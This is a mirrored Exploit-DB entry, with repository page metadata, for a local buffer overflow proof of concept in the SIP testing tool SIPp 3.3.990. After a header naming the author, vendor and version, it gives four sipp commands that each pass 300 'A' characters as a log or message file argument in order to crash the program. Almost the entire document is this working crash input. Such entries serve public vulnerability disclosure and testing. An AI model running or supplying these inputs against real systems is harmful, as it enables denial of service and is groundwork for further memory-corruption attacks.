exploit-db-mirror/exploits/linux/dos/45750.txt
Offensive Security 36c084c351 DB: 2021-09-03
45419 changes to exploits/shellcodes

2 new exploits/shellcodes

Too many to list!
2021-09-03 13:39:06 +00:00

23 lines
No EOL
606 B
Text

# Exploit Title: SIPp 3.3.990 - Local Buffer Overflow (PoC)
# Date: 2018-10-29
# Exploit Author: Nawaf Alkeraithe
# Vendor Homepage: http://sipp.sourceforge.net/
# Software Link:
https://sourceforge.net/projects/sipp/files/sipp/3.4/sipp-3.3.990.tar.gz/download
<https://github.com/SIPp/sipp/releases>
# Version: SIPp v3.4-beta1 (aka v3.3.990)-SCTP-PCAP built Oct 29 2018
# Tested on: 3.3.990
$ ./sipp -trace_logs $(python -c 'print "A"*300')
$ ./sipp -message_file $(python -c 'print "A"*300')
$ ./sipp -calldebug_file $(python -c 'print "A"*300')
$ ./sipp -trace_err $(python -c 'print "A"*300')